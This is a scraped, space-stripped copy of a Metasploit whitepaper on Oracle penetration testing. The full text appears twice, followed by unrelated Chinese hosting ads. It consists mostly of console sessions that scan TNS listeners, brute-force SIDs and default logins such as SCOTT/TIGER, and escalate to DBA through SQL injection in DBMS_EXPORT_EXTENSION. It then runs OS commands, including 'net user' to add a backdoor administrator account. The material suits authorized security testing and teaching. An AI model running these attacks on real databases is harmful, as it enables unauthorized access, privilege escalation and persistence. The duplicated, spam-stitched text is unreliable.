commandsnetuser
netuser 时间:2021-04-18 阅读:()
OraclePenetrationTestingUsingtheMetasploitFrameworkChrisGates&MarioCeballosMetasploitProjectAbstractOvertheyearstherehavebeentonsofOracleexploits,SQLInjectionvulnerabilities,andpostexploitationtricksandtoolsthathadnoorder,methodology,orstandardization,mainlyjustrandom.
sqlfiles.
Additionally,noneofthepubliclyavailablePentestFrameworkshavetheabilitytoleveragebuilt-inpackageSQLInjectionvulnerabilitiesforprivilegeescalation,dataextraction,orgettingoperatingsystemaccess.
InthiswhitepaperwewillpresentanOraclePentestingMethodologyandgiveyouallthetoolstobreakthe"unbreakable"OracleasMetasploitauxiliarymodules.
We'vecreatedyourversionandSIDenumerationmodules,accountbruteforcingmodules,portedallthepublic(andnotsopublic)OracleSQLInjectionvulnerabilitiesintoSQLImodules(withIDSevasionexamplesfor10g/11g),modulesforOSinteraction,andmodulesforautomatingsomeofourpostexploitationtasks.
ThemodulesarecurrentlyonlysupportedunderLinuxandOSX.
OraclePenetrationTestingMethodologyLocateasystemrunningOracle.
DetermineOracleVersion.
DetermineOracleSID.
Guess/BruteforceUSERNAME/PASS.
PrivilegeEscalationviaSQLInjection.
ManipulateData/PostExploitation.
CoverTracks.
LocatinganOracleSystemYouwilltypicallyfindmostOracleinstallationsbyperformingportscanninginthetargetnetblock.
TheOraclelistenerdefaultportis1521butcanlistenonanportgenerallyinthe1521-1540range.
YoucanalsodiscoveroracleinstancesbyscanningothercommonOracleports.
Reviewhttp://www.
red-database-security.
com/whitepaper/oracle_default_ports.
htmlforcommonOracleports.
GenerallyrunningaservicescanwillNOTgiveyoutheOracleTNSListenerversionbutupdatedfingerprintsfornewversionsofNmapmayyieldversionsinsomesituations.
cg@attack:~$nmap-sV192.
168.
0.
100-105-p1521StartingNmap4.
85BETA8(http://nmap.
org)at2009-06-1815:25EDTInterestingportson192.
168.
0.
100:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListenerInterestingportson192.
168.
0.
101:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListener9.
2.
0.
1.
0(for32-bitWindows)YoucanalsodiscoverOracleinstancesusingsearchengines.
AlexKornbrustofRed-Database-Securityhaswrittentwoexcellentwhitepapersdiscussingthissubject.
1,2TNSandOracleMixinsforMetasploit.
TwonewmixinshavebeenaddedtotheMetasploitTrunk.
ThefirstmixinisaTNSmixinthatallowsMetasploittocraftTNSpackets.
ThesecondmixinisanOraclemixinthatallowsustousesomeadditionallibariestowrapOraclecommands.
TheTNSmixinishandybecauseitessentiallyreplacestnscmd.
plyoucanpassanydatayouwantinsidetheTNSpacket.
Connectconnect_data="(CONNECT_DATA=(COMMAND=VERSION))"pkt=tns_packet(connect_data)sock.
put(pkt)sock.
get_onceres=sock.
get_once(-1,2)putsresdisconnectTheOraclemixinservesasthewrappercodeforruby-dbi,ruby-oci8,andtheoraclesqlplusclient.
Ithandlesconnectingtotheremotedatabase,sendingSQLqueriesanddisconnecting.
Thecoreofthisfunctionalityisfoundintheprepare_exec()method.
ThismethodconnectstothedatabaseusingDBIDBI.
connect("DBI:OCI8://#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}","#{datastore['DBUSER']}","#{datastore['DBPASS']}")andthenpasseswhateverdata(SQL)youspecify.
function="CREATEORREPLACEFUNCTION#{p}RETURNNUMBERAUTHIDCURRENT_USERASPRAGMAAUTONOMOUS_TRANSACTION;BEGINEXECUTEIMMEDIATE'#{datastore['SQL']}';COMMIT;RETURN(0);1http://www.
red-database-security.
com/wp/google_oracle_hacking_us.
pdf2http://www.
red-database-security.
com/wp/yahoo_oracle_hacking_us.
pdfEND;"beginprint_status("Sendingfunction.
.
.
")prepare_exec(function)endDetermineOracleVersionusingMetasploitModules.
AOracleversionscannerusingtheTNSmixinhasbeenaddedtotheMetasploittrunk.
msfauxiliary(tnslsnr_version)>infoName:OracletnslsnrServiceVersionQuery.
Version:6479License:MetasploitFrameworkLicense(BSD)Providedby:CGBasicoptions:NameCurrentSettingRequiredDescriptionRHOSTSyesThetargetaddressrangeorCIDRidentifierRPORT1521yesThetargetportTHREADS1yesThenumberofconcurrentthreadsDescription:ThismodulesimplyqueriesthetnslsnrservicefortheOraclebuild.
msfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
100RHOSTS=>192.
168.
0.
100msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
100isrunning:32-bitWindows:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
101RHOSTS=>192.
168.
0.
101msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
101isrunning:32-bitWindows:Version9.
2.
0.
7.
0–Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
102RHOSTS=>192.
168.
0.
102msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
102isrunning:Solaris:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
103RHOSTS=>192.
168.
0.
103msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
103isrunning:Linux:Version11.
1.
0.
6.
0-Production[*]AuxiliarymoduleexecutioncompletedDetermineOracleSIDusingMetasploitModulesOraclepriorto9.
2.
0.
8willjustreturntheSIDifrequested.
After9.
2.
0.
8andforallnewversionsofOracleyouhavetoguess,bruteforce,orotherwisedeterminetheSID.
[*]Host192.
168.
0.
105isrunning:32-bitWindows:Version9.
2.
0.
1.
0–Productionmsf>useauxiliary/scanner/oracle/sid_enummsfauxiliary(sid_enum)setRHOSTS192.
168.
0.
105RHOSTS=>192.
168.
0.
105msfauxiliary(sid_enum)>run[*]IdentifiedSIDfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSIDfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxtXDB[*]AuxiliarymoduleexecutioncompletedBruteforcingtheSIDWeusetheServiceID(SID)listfromRed-Database-Security3andperformadictionaryattack.
msfauxiliary(sid_brute)>run[*]Startingbruteforceon192.
168.
0.
103,usingsidsfrom/home/cg/evil/msf3/dev/data/exploits/sid.
txt.
.
.
[*]FoundSID'ORCL'forhost192.
168.
0.
103[*]AuxiliarymoduleexecutioncompletedUsingotherOraclecomponentstodeterminetheSIDWecanuseotherOracleservletsandapplicationstolearntheSIDiftheyareavailable.
EnterpriseMangerConsoleexample:3http://www.
red-database-security.
com/scripts/sid.
txtmsfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/oas_sidmsfauxiliary(oas_sid)>run[*]DiscoveredSID:'orc10'forhost172.
10.
1.
109[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(oas_sid)>Servelet/spyexample:msfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/spy_sidmsfauxiliary(spy_sid)>run[*]DiscoveredSID:'orcl'forhost192.
168.
0.
103[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(spy_sid)>Guess/BruteforceUSER/PASSWeusePeteFinnigan'sdefaultpasswordlist4msfauxiliary(brute_login)>run.
[-]ORA-01017:invalidusername/password;logondenied[-]ORA-01017:invalidusername/password;logondenied[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(brute_login)>db_notes[*]Time:SatMay3008:44:09-05002009Note:host=172.
10.
1.
109type=BRUTEFORCED_ACCOUNTdata=SCOTT/TIGERSQLInjectionforPrivilegeEscalationmsf>useauxiliary/sqli/oracle/dbms_export_extensionmsfauxiliary(dbms_export_extension)>infoName:SQLInjectionviaDBMS_EXPORT_EXTENSION.
Version:$Revision:$Providedby:MCBasicoptions:NameCurrentSettingRequiredDescription4http://www.
petefinnigan.
com/default/default_password_list.
htmSQLGRANTDBATOSCOTTyesnoSQLtorun.
DBPASSTIGERyesThepasswordtoauthenticateas.
DBUSERSCOTTyesTheusernametoauthenticateas.
RHOST127.
0.
0.
1yesTheOraclehost.
RPORT1521yesTheTNSport.
SIDDEMOyesThesidtoauthenticatewith.
Description:ThismodulewillescalateaOracleDBusertoDBAbyexploitingansqlinjectionbugintheDBMS_EXPORT_EXTENSIONpackage.
msfauxiliary(dbms_export_extension)>setRHOST192.
168.
100.
25RHOST=>192.
168.
100.
25msfauxiliary(dbms_export_extension)>setSIDUNLUCKYSID=>UNLUCKYmsfauxiliary(dbms_export_extension)>run[*]Sendingpackage.
.
.
[*]Done.
.
.
[*]Sendingbody.
.
.
[*]Done.
.
.
[*]Sendingdeclare.
.
.
[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(dbms_export_extension)>Verifyitworkedmsfauxiliary(oracle_sql)>setSQLselect*fromuser_role_privsSQL=>select*fromuser_role_privsmsfauxiliary(oracle_sql)>run[*]SendingSQL.
.
.
[*]SCOTT,CONNECT,NO,YES,NO[*]SCOTT,DBA,NO,YES,NOPostExploitationTheprimarymoduleforpostexploitationthatwillbereleasedisthewin32_execmodule.
Thismodulecreatesajavaclasstoexecutesystemcommands,executesthosecommands,thendeletestheclass.
Similartothis:http://www.
0xdeadbeef.
info/exploits/raptor_oraexec.
sql.
ThistechniqueisalsodiscussedintheOracleHacker'sHandbookbyDavidLitchfield.
msfauxiliary(win32exec)>setCMD"netuserdbaP@ssW0rd1234/add"CMD=>netuserdbaP@ssW0rd1234/addmsfauxiliary(win32exec)>run[*]CreatingMSFJAVAclass.
.
.
[*]Done.
.
.
[*]CreatingMSFprocedure.
.
.
[*]Done.
.
.
[*]Sendingcommand:'netuserdbaP@ssW0rd1234/add'[*]Done.
.
.
[*]AuxiliarymoduleexecutioncompletedUsefulSiteforOracleHackinghttp://www.
red-database-security.
com/http://www.
petefinnigan.
com/http://rawlab.
mindcreations.
com/http://www.
0xdeadbeef.
info/http://dsecrg.
com/http://www.
databasesecurity.
com/http://www.
davidlitchfield.
com/security.
htmhttp://www.
ngssoftware.
com/research/http://sourceforge.
net/projects/ingumahttp://www.
oracleforensics.
com/wordpress/DependencyInstallationInstructionsOracleMixinInstallNotesforLinux-testedonUbuntu8.
10&9.
04-startwithaworkingversionofmetasploittrunk#installoracleinstantclient#http://www.
oracle.
com/technology/software/tech/oci/instantclient/index.
html#recommendinstantclient10,thisshouldallowyoutotalkwith8,9,10,&11versions.
Grab*InstantClientPackage-Basic*InstantClientPackage-SDK*InstantClientPackage-SQL*Plus**notneededformetasploitbutusefultohave--unzipinto/opt/oraclecg@segfault:~/$cd/opt/oraclecg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-basic-10.
2.
0.
4-1.
i386.
zipcg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-sqlplus-10.
2.
0.
4-1.
i386.
zicg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-devel-10.
2.
0.
4-1.
i386.
zipitwillunzipeverythinginto/opt/oracle/instantclient_10_2/createyoursymlinkcg@segfault:/opt/oracle/instantclient_10_2$ln-slibclntsh.
so.
10.
1libclntsh.
so#Setupyourenviroment.
bashrcexportPATH=$PATH:/opt/oracle/instantclient_10_2exportSQLPATH=/opt/oracle/instantclient_10_2exportTNS_ADMIN=/opt/oracle/instantclient_10_2exportLD_LIBRARY_PATH=/opt/oracle/instantclient_10_2exportORACLE_HOME=/opt/oracle/instantclient_10_2#Installruby-dbi-0.
1.
1#http://rubyforge.
org/projects/ruby-dbi/#http://rubyforge.
org/frs/download.
php/12368/dbi-0.
1.
1.
tar.
gzcg@segfault:~$tarxvzfdbi-0.
1.
1.
tar.
gzcg@segfault:~$cdruby-dbi/(Hint:Catthe.
.
/ruby-dbi/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-dbi$rubysetup.
rbconfig--with=dbi,dbd_pgcg@segfault:~/ruby-dbi$rubysetup.
rbsetupcg@segfault:~/ruby-dbi$sudorubysetup.
rbinstall#Installruby-oci8-1.
0.
0#http://rubyforge.
org/projects/ruby-oci8/#http://rubyforge.
org/frs/download.
php/28396/ruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$tarxvzfruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$cdruby-oci8-1.
0.
0/(Hint:Catthe.
.
ruby-oci8-1.
0.
0/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-oci8-1.
0.
0$envcg@segfault:~/ruby-oci8-1.
0.
0$LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2/cg@segfault:~/ruby-oci8-1.
0.
0$exportLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$env|grepLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$makecg@segfault:~/ruby-oci8-1.
0.
0$sudomakeinstall#verifysqlplusworkscg@segfault:~$sqlplusSQL*Plus:Release10.
2.
0.
4.
0-ProductiononSunMay312:24:512009Copyright(c)1982,2007,Oracle.
AllRightsReserved.
Enteruser-name:#testtheOraclemodulesmsfauxiliary(sql)>run[*]SendingSQL.
.
.
[*]Oracle8iEnterpriseEditionRelease8.
1.
7.
0.
0-Production[*]PL/SQLRelease8.
1.
7.
0.
0-Production[*]CORE8.
1.
7.
0.
0Production[*]TNSforSolaris:Version8.
1.
7.
0.
0-Production[*]NLSRTLVersion3.
4.
1.
0.
0-Production[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sql)>
sqlfiles.
Additionally,noneofthepubliclyavailablePentestFrameworkshavetheabilitytoleveragebuilt-inpackageSQLInjectionvulnerabilitiesforprivilegeescalation,dataextraction,orgettingoperatingsystemaccess.
InthiswhitepaperwewillpresentanOraclePentestingMethodologyandgiveyouallthetoolstobreakthe"unbreakable"OracleasMetasploitauxiliarymodules.
We'vecreatedyourversionandSIDenumerationmodules,accountbruteforcingmodules,portedallthepublic(andnotsopublic)OracleSQLInjectionvulnerabilitiesintoSQLImodules(withIDSevasionexamplesfor10g/11g),modulesforOSinteraction,andmodulesforautomatingsomeofourpostexploitationtasks.
ThemodulesarecurrentlyonlysupportedunderLinuxandOSX.
OraclePenetrationTestingMethodologyLocateasystemrunningOracle.
DetermineOracleVersion.
DetermineOracleSID.
Guess/BruteforceUSERNAME/PASS.
PrivilegeEscalationviaSQLInjection.
ManipulateData/PostExploitation.
CoverTracks.
LocatinganOracleSystemYouwilltypicallyfindmostOracleinstallationsbyperformingportscanninginthetargetnetblock.
TheOraclelistenerdefaultportis1521butcanlistenonanportgenerallyinthe1521-1540range.
YoucanalsodiscoveroracleinstancesbyscanningothercommonOracleports.
Reviewhttp://www.
red-database-security.
com/whitepaper/oracle_default_ports.
htmlforcommonOracleports.
GenerallyrunningaservicescanwillNOTgiveyoutheOracleTNSListenerversionbutupdatedfingerprintsfornewversionsofNmapmayyieldversionsinsomesituations.
cg@attack:~$nmap-sV192.
168.
0.
100-105-p1521StartingNmap4.
85BETA8(http://nmap.
org)at2009-06-1815:25EDTInterestingportson192.
168.
0.
100:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListenerInterestingportson192.
168.
0.
101:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListener9.
2.
0.
1.
0(for32-bitWindows)YoucanalsodiscoverOracleinstancesusingsearchengines.
AlexKornbrustofRed-Database-Securityhaswrittentwoexcellentwhitepapersdiscussingthissubject.
1,2TNSandOracleMixinsforMetasploit.
TwonewmixinshavebeenaddedtotheMetasploitTrunk.
ThefirstmixinisaTNSmixinthatallowsMetasploittocraftTNSpackets.
ThesecondmixinisanOraclemixinthatallowsustousesomeadditionallibariestowrapOraclecommands.
TheTNSmixinishandybecauseitessentiallyreplacestnscmd.
plyoucanpassanydatayouwantinsidetheTNSpacket.
Connectconnect_data="(CONNECT_DATA=(COMMAND=VERSION))"pkt=tns_packet(connect_data)sock.
put(pkt)sock.
get_onceres=sock.
get_once(-1,2)putsresdisconnectTheOraclemixinservesasthewrappercodeforruby-dbi,ruby-oci8,andtheoraclesqlplusclient.
Ithandlesconnectingtotheremotedatabase,sendingSQLqueriesanddisconnecting.
Thecoreofthisfunctionalityisfoundintheprepare_exec()method.
ThismethodconnectstothedatabaseusingDBIDBI.
connect("DBI:OCI8://#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}","#{datastore['DBUSER']}","#{datastore['DBPASS']}")andthenpasseswhateverdata(SQL)youspecify.
function="CREATEORREPLACEFUNCTION#{p}RETURNNUMBERAUTHIDCURRENT_USERASPRAGMAAUTONOMOUS_TRANSACTION;BEGINEXECUTEIMMEDIATE'#{datastore['SQL']}';COMMIT;RETURN(0);1http://www.
red-database-security.
com/wp/google_oracle_hacking_us.
pdf2http://www.
red-database-security.
com/wp/yahoo_oracle_hacking_us.
pdfEND;"beginprint_status("Sendingfunction.
.
.
")prepare_exec(function)endDetermineOracleVersionusingMetasploitModules.
AOracleversionscannerusingtheTNSmixinhasbeenaddedtotheMetasploittrunk.
msfauxiliary(tnslsnr_version)>infoName:OracletnslsnrServiceVersionQuery.
Version:6479License:MetasploitFrameworkLicense(BSD)Providedby:CGBasicoptions:NameCurrentSettingRequiredDescriptionRHOSTSyesThetargetaddressrangeorCIDRidentifierRPORT1521yesThetargetportTHREADS1yesThenumberofconcurrentthreadsDescription:ThismodulesimplyqueriesthetnslsnrservicefortheOraclebuild.
msfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
100RHOSTS=>192.
168.
0.
100msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
100isrunning:32-bitWindows:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
101RHOSTS=>192.
168.
0.
101msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
101isrunning:32-bitWindows:Version9.
2.
0.
7.
0–Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
102RHOSTS=>192.
168.
0.
102msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
102isrunning:Solaris:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
103RHOSTS=>192.
168.
0.
103msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
103isrunning:Linux:Version11.
1.
0.
6.
0-Production[*]AuxiliarymoduleexecutioncompletedDetermineOracleSIDusingMetasploitModulesOraclepriorto9.
2.
0.
8willjustreturntheSIDifrequested.
After9.
2.
0.
8andforallnewversionsofOracleyouhavetoguess,bruteforce,orotherwisedeterminetheSID.
[*]Host192.
168.
0.
105isrunning:32-bitWindows:Version9.
2.
0.
1.
0–Productionmsf>useauxiliary/scanner/oracle/sid_enummsfauxiliary(sid_enum)setRHOSTS192.
168.
0.
105RHOSTS=>192.
168.
0.
105msfauxiliary(sid_enum)>run[*]IdentifiedSIDfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSIDfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxtXDB[*]AuxiliarymoduleexecutioncompletedBruteforcingtheSIDWeusetheServiceID(SID)listfromRed-Database-Security3andperformadictionaryattack.
msfauxiliary(sid_brute)>run[*]Startingbruteforceon192.
168.
0.
103,usingsidsfrom/home/cg/evil/msf3/dev/data/exploits/sid.
txt.
.
.
[*]FoundSID'ORCL'forhost192.
168.
0.
103[*]AuxiliarymoduleexecutioncompletedUsingotherOraclecomponentstodeterminetheSIDWecanuseotherOracleservletsandapplicationstolearntheSIDiftheyareavailable.
EnterpriseMangerConsoleexample:3http://www.
red-database-security.
com/scripts/sid.
txtmsfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/oas_sidmsfauxiliary(oas_sid)>run[*]DiscoveredSID:'orc10'forhost172.
10.
1.
109[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(oas_sid)>Servelet/spyexample:msfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/spy_sidmsfauxiliary(spy_sid)>run[*]DiscoveredSID:'orcl'forhost192.
168.
0.
103[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(spy_sid)>Guess/BruteforceUSER/PASSWeusePeteFinnigan'sdefaultpasswordlist4msfauxiliary(brute_login)>run.
[-]ORA-01017:invalidusername/password;logondenied[-]ORA-01017:invalidusername/password;logondenied[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(brute_login)>db_notes[*]Time:SatMay3008:44:09-05002009Note:host=172.
10.
1.
109type=BRUTEFORCED_ACCOUNTdata=SCOTT/TIGERSQLInjectionforPrivilegeEscalationmsf>useauxiliary/sqli/oracle/dbms_export_extensionmsfauxiliary(dbms_export_extension)>infoName:SQLInjectionviaDBMS_EXPORT_EXTENSION.
Version:$Revision:$Providedby:MCBasicoptions:NameCurrentSettingRequiredDescription4http://www.
petefinnigan.
com/default/default_password_list.
htmSQLGRANTDBATOSCOTTyesnoSQLtorun.
DBPASSTIGERyesThepasswordtoauthenticateas.
DBUSERSCOTTyesTheusernametoauthenticateas.
RHOST127.
0.
0.
1yesTheOraclehost.
RPORT1521yesTheTNSport.
SIDDEMOyesThesidtoauthenticatewith.
Description:ThismodulewillescalateaOracleDBusertoDBAbyexploitingansqlinjectionbugintheDBMS_EXPORT_EXTENSIONpackage.
msfauxiliary(dbms_export_extension)>setRHOST192.
168.
100.
25RHOST=>192.
168.
100.
25msfauxiliary(dbms_export_extension)>setSIDUNLUCKYSID=>UNLUCKYmsfauxiliary(dbms_export_extension)>run[*]Sendingpackage.
.
.
[*]Done.
.
.
[*]Sendingbody.
.
.
[*]Done.
.
.
[*]Sendingdeclare.
.
.
[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(dbms_export_extension)>Verifyitworkedmsfauxiliary(oracle_sql)>setSQLselect*fromuser_role_privsSQL=>select*fromuser_role_privsmsfauxiliary(oracle_sql)>run[*]SendingSQL.
.
.
[*]SCOTT,CONNECT,NO,YES,NO[*]SCOTT,DBA,NO,YES,NOPostExploitationTheprimarymoduleforpostexploitationthatwillbereleasedisthewin32_execmodule.
Thismodulecreatesajavaclasstoexecutesystemcommands,executesthosecommands,thendeletestheclass.
Similartothis:http://www.
0xdeadbeef.
info/exploits/raptor_oraexec.
sql.
ThistechniqueisalsodiscussedintheOracleHacker'sHandbookbyDavidLitchfield.
msfauxiliary(win32exec)>setCMD"netuserdbaP@ssW0rd1234/add"CMD=>netuserdbaP@ssW0rd1234/addmsfauxiliary(win32exec)>run[*]CreatingMSFJAVAclass.
.
.
[*]Done.
.
.
[*]CreatingMSFprocedure.
.
.
[*]Done.
.
.
[*]Sendingcommand:'netuserdbaP@ssW0rd1234/add'[*]Done.
.
.
[*]AuxiliarymoduleexecutioncompletedUsefulSiteforOracleHackinghttp://www.
red-database-security.
com/http://www.
petefinnigan.
com/http://rawlab.
mindcreations.
com/http://www.
0xdeadbeef.
info/http://dsecrg.
com/http://www.
databasesecurity.
com/http://www.
davidlitchfield.
com/security.
htmhttp://www.
ngssoftware.
com/research/http://sourceforge.
net/projects/ingumahttp://www.
oracleforensics.
com/wordpress/DependencyInstallationInstructionsOracleMixinInstallNotesforLinux-testedonUbuntu8.
10&9.
04-startwithaworkingversionofmetasploittrunk#installoracleinstantclient#http://www.
oracle.
com/technology/software/tech/oci/instantclient/index.
html#recommendinstantclient10,thisshouldallowyoutotalkwith8,9,10,&11versions.
Grab*InstantClientPackage-Basic*InstantClientPackage-SDK*InstantClientPackage-SQL*Plus**notneededformetasploitbutusefultohave--unzipinto/opt/oraclecg@segfault:~/$cd/opt/oraclecg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-basic-10.
2.
0.
4-1.
i386.
zipcg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-sqlplus-10.
2.
0.
4-1.
i386.
zicg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-devel-10.
2.
0.
4-1.
i386.
zipitwillunzipeverythinginto/opt/oracle/instantclient_10_2/createyoursymlinkcg@segfault:/opt/oracle/instantclient_10_2$ln-slibclntsh.
so.
10.
1libclntsh.
so#Setupyourenviroment.
bashrcexportPATH=$PATH:/opt/oracle/instantclient_10_2exportSQLPATH=/opt/oracle/instantclient_10_2exportTNS_ADMIN=/opt/oracle/instantclient_10_2exportLD_LIBRARY_PATH=/opt/oracle/instantclient_10_2exportORACLE_HOME=/opt/oracle/instantclient_10_2#Installruby-dbi-0.
1.
1#http://rubyforge.
org/projects/ruby-dbi/#http://rubyforge.
org/frs/download.
php/12368/dbi-0.
1.
1.
tar.
gzcg@segfault:~$tarxvzfdbi-0.
1.
1.
tar.
gzcg@segfault:~$cdruby-dbi/(Hint:Catthe.
.
/ruby-dbi/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-dbi$rubysetup.
rbconfig--with=dbi,dbd_pgcg@segfault:~/ruby-dbi$rubysetup.
rbsetupcg@segfault:~/ruby-dbi$sudorubysetup.
rbinstall#Installruby-oci8-1.
0.
0#http://rubyforge.
org/projects/ruby-oci8/#http://rubyforge.
org/frs/download.
php/28396/ruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$tarxvzfruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$cdruby-oci8-1.
0.
0/(Hint:Catthe.
.
ruby-oci8-1.
0.
0/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-oci8-1.
0.
0$envcg@segfault:~/ruby-oci8-1.
0.
0$LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2/cg@segfault:~/ruby-oci8-1.
0.
0$exportLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$env|grepLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$makecg@segfault:~/ruby-oci8-1.
0.
0$sudomakeinstall#verifysqlplusworkscg@segfault:~$sqlplusSQL*Plus:Release10.
2.
0.
4.
0-ProductiononSunMay312:24:512009Copyright(c)1982,2007,Oracle.
AllRightsReserved.
Enteruser-name:#testtheOraclemodulesmsfauxiliary(sql)>run[*]SendingSQL.
.
.
[*]Oracle8iEnterpriseEditionRelease8.
1.
7.
0.
0-Production[*]PL/SQLRelease8.
1.
7.
0.
0-Production[*]CORE8.
1.
7.
0.
0Production[*]TNSforSolaris:Version8.
1.
7.
0.
0-Production[*]NLSRTLVersion3.
4.
1.
0.
0-Production[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sql)>
- commandsnetuser相关文档
- daynetuser
- canetuser
- 2015年本科生毕业论文检测系统启用说明
- Audionetuser
- correctednetuser
- Periodicallynetuser
bgpto:日本独立服务器6.5折($120起),新加坡独立服务器7.5折($93起)
bgp.to在对日本东京的独立服务器进行6.5折终身优惠促销,低至$120/月;对新加坡独立服务器进行7.5折终身优惠促销,低至$93/月。所有服务器都是直连国内,速度上面相比欧洲、美国有明显的优势,特别适合建站、远程办公等多种用途。官方网站:https://www.bgp.to/dedicated.html主打日本(东京、大阪)、新加坡、香港(CN)、洛杉矶(US)的服务器业务!日本服务器CPU...
Hosteons:洛杉矶/纽约/达拉斯免费升级10Gbps端口,KVM年付21美元起
今年1月的时候Hosteons开始提供1Gbps端口KVM架构VPS,目前商家在LET发布消息,到本月30日之前,用户下单洛杉矶/纽约/达拉斯三个地区机房KVM主机可以从1Gbps免费升级到10Gbps端口,最低年付仅21美元起。Hosteons是一家成立于2018年的国外VPS主机商,主要提供VPS、Hybrid Dedicated Servers及独立服务器租用等,提供IPv4+IPv6,支持...
妮妮云36元,美国VPS洛杉矶 8核 8G 36元/月,香港葵湾 8核 8G
妮妮云的来历妮妮云是 789 陈总 张总 三方共同投资建立的网站 本着“良心 便宜 稳定”的初衷 为小白用户避免被坑妮妮云的市场定位妮妮云主要代理市场稳定速度的云服务器产品,避免新手购买云服务器的时候众多商家不知道如何选择,妮妮云就帮你选择好了产品,无需承担购买风险,不用担心出现被跑路 被诈骗的情况。妮妮云的售后保证妮妮云退款 通过于合作商的友好协商,云服务器提供2天内全额退款,超过2天不退款 物...
netuser为你推荐
-
企业邮局系统企业邮件系统用什么软件好?2019支付宝五福支付宝五福是哪五福?德国iphone禁售令德国买iPhone现在多少钱?cuteftp什么是CuteFTP?如何将网站内容上传(FTP)到网站空间?泉州商标注册泉州注册一个商标具体要怎么弄?具体流程是什么?爱买网超爱买网的特点我爱e书网侯龙涛小说那里有下载的免费代理加盟怎样免费加盟代理淘宝最土团购程序公司要开设一个团购项目,应该如何运作?地址栏图标网站添加地址栏图标代码怎么写?